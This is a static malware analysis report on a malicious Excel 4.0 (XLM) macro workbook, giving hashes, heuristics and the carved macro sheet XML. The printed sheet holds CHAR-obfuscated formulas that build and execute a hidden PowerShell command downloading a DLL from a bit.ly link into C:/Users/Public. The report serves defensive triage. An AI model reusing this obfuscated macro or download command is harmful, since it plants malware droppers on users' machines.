Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3917ffa0341478d8…

MALICIOUS

Office (OOXML)

159.1 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-22
MD5: 4fcd34b4ed30d74b44eaae1f53c49734 SHA-1: e7d1bc3d77df1631bd87f19cac22a41f3b4eafc4 SHA-256: 3917ffa0341478d8d427f5815903ef7e0e29fe93834ce27982eb9e4ffdc85ebc
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro sheet containing an Auto_Open defined name, which is a common technique for executing malicious macros upon opening the document. The macros utilize dangerous XLM functions like EXEC and FORMULA to download and execute a payload from the URL https://bit.ly/36yBFdu. This indicates a downloader or droppper functionality.

Heuristics 5

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: GOTO, EXEC, FORMULA critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)
    • https://bit.ly/36yBFduIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 22375 bytes
SHA-256: 31472c48afd1d9839c192a47dc0c1972d48384e142cca2aa0ee02786a7ecc4ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{738BC0DD-2038-4C8E-9D4F-E19AF1D8C361}"><dimension ref="A1:W574"/><sheetViews><sheetView showFormulas="1" tabSelected="1" topLeftCell="J450" zoomScaleNormal="100" workbookViewId="0"><selection activeCell="L459" sqref="L459"/></sheetView></sheetViews><sheetFormatPr defaultRowHeight="15"/><cols><col min="1" max="1" width="32.28515625" style="1" customWidth="1"/><col min="2" max="2" width="34.42578125" style="1" customWidth="1"/><col min="3" max="3" width="9.85546875" style="1" customWidth="1"/><col min="4" max="4" width="10.140625" style="1" customWidth="1"/><col min="5" max="5" width="13.28515625" style="1" customWidth="1"/><col min="6" max="6" width="9.42578125" style="1" customWidth="1"/><col min="7" max="7" width="10.85546875" style="1" customWidth="1"/><col min="8" max="22" width="9.140625" style="1"/><col min="23" max="23" width="12.42578125" style="1" bestFit="1" customWidth="1"/><col min="24" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="1" spans="3:8"><c r="C1" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H1" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="2" spans="3:8"><c r="C2" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H2" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="3" spans="3:8"><c r="C3" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H3" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="4" spans="3:8"><c r="C4" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H4" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="5" spans="3:8"><c r="C5" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H5" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="6" spans="3:8"><c r="C6" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H6" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="7" spans="3:8"><c r="C7" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="D7" s="2"><f>IF(GET.DOCUMENT(88)&lt;&gt;"wrongname.xlsm",V7,C10)</f><v>0</v></c><c r="H7" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="9" spans="3:8"><c r="C9" s="1" t="b"><f>ALERT("Good  Job")</f><v>1</v></c></row><row r="10" spans="3:8"><c r="C10" s="1" t="b"><f>GOTO(D9)</f><v>0</v></c></row><row r="11" spans="3:8"><c r="C11" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H11" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(100),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(32),CHAR(99),CHAR(109),CHAR(100),CHAR(32),CHAR(47))</f><v>sdfdsfdsf cmd /</v></c></row><row r="12" spans="3:8"><c r="C12" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H12" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="13" spans="3:8"><c r="C13" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H13" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="14" spans="3:8"><c r="C14" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H14" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="15" spans="3:8"><c r="C15" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H15" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="16" spans="3:8"><c r="C16" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H16" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="17" spans="3:8"><c r="C17" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="H17" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="18" spans="3:8"><c r="C18" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H18" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="19" spans="3:8"><c r="C19" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H19" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(100),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(100),CHAR(115),CHAR(102),CHAR(32),CHAR(99),CHAR(109),CHAR(100),CHAR(32),CHAR(47))</f><v>sdfdsfdsf cmd /</v></c></row><row r="20" spans="3:8"><c r="C20" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H20" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="21" spans="3:8"><c r="C21" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H21" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="22" spans="3:8"><c r="C22" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H22" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="23" spans="3:8"><c r="C23" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H23" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="24" spans="3:8"><c r="C24" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c><c r="H24" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="25" spans="3:8"><c r="C25" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c><c r="H25" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="26" spans="3:8"><c r="C26" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c><c r="H26" s="1" t="str"><f>CONCATENATE(CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(61),CHAR(32),CHAR(116),CHAR(101),CHAR(115),CHAR(116),CHAR(105),CHAR(110),CHAR(103),CHAR(115))</f><v>calc= testings</v></c></row><row r="27" spans="3:8"><c r="C27" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c><c r="H27" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(111),CHAR(110),CHAR(101))</f><v>tone</v></c></row><row r="28" spans="3:8"><c r="C28" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c><c r="H28" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="29" spans="3:8"><c r="C29" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c><c r="H29" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="30" spans="3:8"><c r="C30" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c><c r="H30" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="31" spans="3:8"><c r="C31" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="32" spans="3:8"><c r="C32" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="33" spans="1:3"><c r="C33" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="34" spans="1:3"><c r="C34" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="35" spans="1:3"><c r="C35" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="36" spans="1:3"><c r="C36" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="37" spans="1:3"><c r="C37" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="38" spans="1:3"><c r="C38" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="39" spans="1:3"><c r="A39" s="1" t="b"><f>GOTO(B3)</f><v>1</v></c><c r="C39" s="1" t="str"><f>CONCATENATE(CHAR(109),CHAR(115),CHAR(112),CHAR(97),CHAR(105),CHAR(110),CHAR(116),CHAR(32),CHAR(99),CHAR(97),CHAR(108),CHAR(99),CHAR(32),CHAR(97),CHAR(100))</f><v>mspaint calc ad</v></c></row><row r="40" spans="1:3"><c r="C40" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(32),CHAR(118),CHAR(97),CHAR(108),CHAR(117),CHAR(101),CHAR(32),CHAR(61),CHAR(32),CHAR(49),CHAR(32),CHAR(114),CHAR(101))</f><v>d value = 1 re</v></c></row><row r="41" spans="1:3"><c r="C41" s="1" t="str"><f>CONCATENATE(CHAR(103),CHAR(32),CHAR(103),CHAR(111),CHAR(111),CHAR(103),CHAR(108),CHAR(101),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(44),CHAR(32))</f><v xml:space="preserve">g google.com, </v></c></row><row r="42" spans="1:3"><c r="C42" s="1" t="str"><f>CONCATENATE(CHAR(111),CHAR(112),CHAR(101),CHAR(110),CHAR(95),CHAR(115),CHAR(111),CHAR(99),CHAR(107),CHAR(101),CHAR(116),CHAR(40),CHAR(49),CHAR(50))</f><v>open_socket(12</v></c></row><row r="43" spans="1:3"><c r="C43" s="1" t="str"><f>CONCATENATE(CHAR(55),CHAR(46),CHAR(48),CHAR(46),CHAR(49),CHAR(58),CHAR(56),CHAR(48),CHAR(41),CHAR(44),CHAR(32),CHAR(115),CHAR(121),CHAR(115))</f><v>7.0.1:80), sys</v></c></row><row r="44" spans="1:3"><c r="C44" s="1" t="str"><f>CONCATENATE(CHAR(116),CHAR(101),CHAR(109),CHAR(46),CHAR(112),CHAR(114),CHAR(105),CHAR(110),CHAR(116),CHAR(108),CHAR(110),CHAR(40),CHAR(49),CHAR(41))</f><v>tem.println(1)</v></c></row><row r="45" spans="1:3"><c r="C45" s="1" t="str"><f>CONCATENATE(CHAR(59))</f><v>;</v></c></row><row r="99" spans="1:5"><c r="B99" s="2" t="b"><f>IF(GET.DOCUMENT(88)&lt;&gt;"wrongname.xlsm",GOTO(A108),GOTO(E102))</f><v>1</v></c></row><row r="102" spans="1:5"><c r="E102" s="1" t="b"><f>ALERT("Good  Job")</f><v>1</v></c></row><row r="103" spans="1:5"><c r="E103" s="3"/></row><row r="108" spans="1:5"><c r="A108" s="1" t="b"><f>CLOSE(TRUE)</f><v>0</v></c></row><row r="111" spans="1:5"><c r="E111" s="1" t="b"><f>GOTO(D107)</f><v>1</v></c></row><row r="117" spans="4:7"><c r="D117" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c><c r="G117" s="4" t="str"><f>CONCATENATE(MID("=",1,1),MID("E",1,1),MID("X",1,1),MID("E",1,1),MID("C",1,1),MID("(",1,1),CHAR(34))</f><v>=EXEC("</v></c></row><row r="118" spans="4:7"><c r="D118" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c><c r="G118" s="4" t="str"><f>CONCATENATE(CHAR(34),MID(")",1,1))</f><v>")</v></c></row><row r="119" spans="4:7"><c r="D119" s="4" t="str"><f>CONCATENATE(D117,E152,D118)</f><v>=EXEC("Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll")</v></c><c r="G119" s="4" t="str"><f>CONCATENATE(G117,H152,G118)</f><v>=EXEC("Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll")</v></c></row><row r="120" spans="4:7"><c r="D120" s="4" t="b"><f>FORMULA(D119,D305)</f><v>1</v></c><c r="G120" s="4" t="b"><f>FORMULA(G119,G305)</f><v>1</v></c></row><row r="131" spans="5:5"><c r="E131" s="1" t="str"><f>CONCATENATE(CHAR(100),CHAR(111),CHAR(119),CHAR(115),CHAR(116),CHAR(121),CHAR(108),CHAR(101),CHAR(32),CHAR(104),CHAR(105),CHAR(100),CHAR(100),CHAR(101))</f><v>dowstyle hidde</v></c></row><row r="132" spans="5:5"><c r="E132" s="1" t="str"><f>CONCATENATE(CHAR(80),CHAR(111),CHAR(119),CHAR(101),CHAR(114),CHAR(115),CHAR(104),CHAR(101),CHAR(108),CHAR(108),CHAR(32),CHAR(45),CHAR(119),CHAR(105),CHAR(110))</f><v>Powershell -win</v></c></row><row r="134" spans="5:5"><c r="E134" s="1" t="str"><f>CONCATENATE(CHAR(110),CHAR(32),CHAR(45),CHAR(69),CHAR(120),CHAR(101),CHAR(99),CHAR(117),CHAR(116),CHAR(105),CHAR(111),CHAR(110),CHAR(80),CHAR(111))</f><v>n -ExecutionPo</v></c></row><row r="135" spans="5:5"><c r="E135" s="1" t="str"><f>CONCATENATE(CHAR(108),CHAR(105),CHAR(99),CHAR(121),CHAR(32),CHAR(66),CHAR(121),CHAR(112),CHAR(97),CHAR(115),CHAR(115),CHAR(32),CHAR(119),CHAR(103))</f><v>licy Bypass wg</v></c></row><row r="136" spans="5:5"><c r="E136" s="1" t="str"><f>CONCATENATE(CHAR(101),CHAR(116),CHAR(32),CHAR(104),CHAR(116),CHAR(116),CHAR(112),CHAR(115),CHAR(58),CHAR(47),CHAR(47),CHAR(98),CHAR(105),CHAR(116))</f><v>et https://bit</v></c></row><row r="137" spans="5:5"><c r="E137" s="1" t="str"><f>CONCATENATE(CHAR(46),CHAR(108),CHAR(121),CHAR(47),CHAR(51),CHAR(54),CHAR(121),CHAR(66),CHAR(70),CHAR(100),CHAR(117),CHAR(32),CHAR(45),CHAR(79))</f><v>.ly/36yBFdu -O</v></c></row><row r="138" spans="5:5"><c r="E138" s="1" t="str"><f>CONCATENATE(CHAR(117),CHAR(116),CHAR(70),CHAR(105),CHAR(108),CHAR(101),CHAR(32),CHAR(67),CHAR(58),CHAR(47),CHAR(85),CHAR(115),CHAR(101),CHAR(114))</f><v>utFile C:/User</v></c></row><row r="139" spans="5:5"><c r="E139" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(47),CHAR(80),CHAR(117),CHAR(98),CHAR(108),CHAR(105),CHAR(99),CHAR(47),CHAR(77),CHAR(105),CHAR(99),CHAR(114),CHAR(111))</f><v>s/Public/Micro</v></c></row><row r="140" spans="5:5"><c r="E140" s="1" t="str"><f>CONCATENATE(CHAR(115),CHAR(111),CHAR(102),CHAR(116),CHAR(46),CHAR(100),CHAR(108),CHAR(108))</f><v>soft.dll</v></c></row><row r="147" spans="5:5"><c r="E147" s="1" t="str"><f>CONCATENATE(E132,E131)</f><v>Powershell -windowstyle hidde</v></c></row><row r="148" spans="5:5"><c r="E148" s="1" t="str"><f>CONCATENATE(E134,E135)</f><v>n -ExecutionPolicy Bypass wg</v></c></row><row r="149" spans="5:5"><c r="E149" s="1" t="str"><f>CONCATENATE(E136,E137)</f><v>et https://bit.ly/36yBFdu -O</v></c></row><row r="150" spans="5:5"><c r="E150" s="1" t="str"><f>CONCATENATE(E138,E139)</f><v>utFile C:/Users/Public/Micro</v></c></row><row r="151" spans="5:5"><c r="E151" s="1" t="str"><f>CONCATENATE(E147,E148,E149,E150)</f><v>Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Micro</v></c></row><row r="152" spans="5:5"><c r="E152" s="1" t="str"><f>CONCATENATE(E151,E140)</f><v>Powershell -windowstyle hidden -ExecutionPolicy Bypass wget https://bit.ly/36yBFdu -OutFile C:/Users/Public/Microsoft.dll</v></c></row><row r="305" spans="4:4"><c r="D305" s="1" t="s"><v>0</v></c></row><row r="315" spans="4:4"><c r="D315" s="1" t="b"><f>FORMULA("Finished",D305)</f><v>1</v></c></row><row r="474" spans="23:23"><c r="W474" s="1" 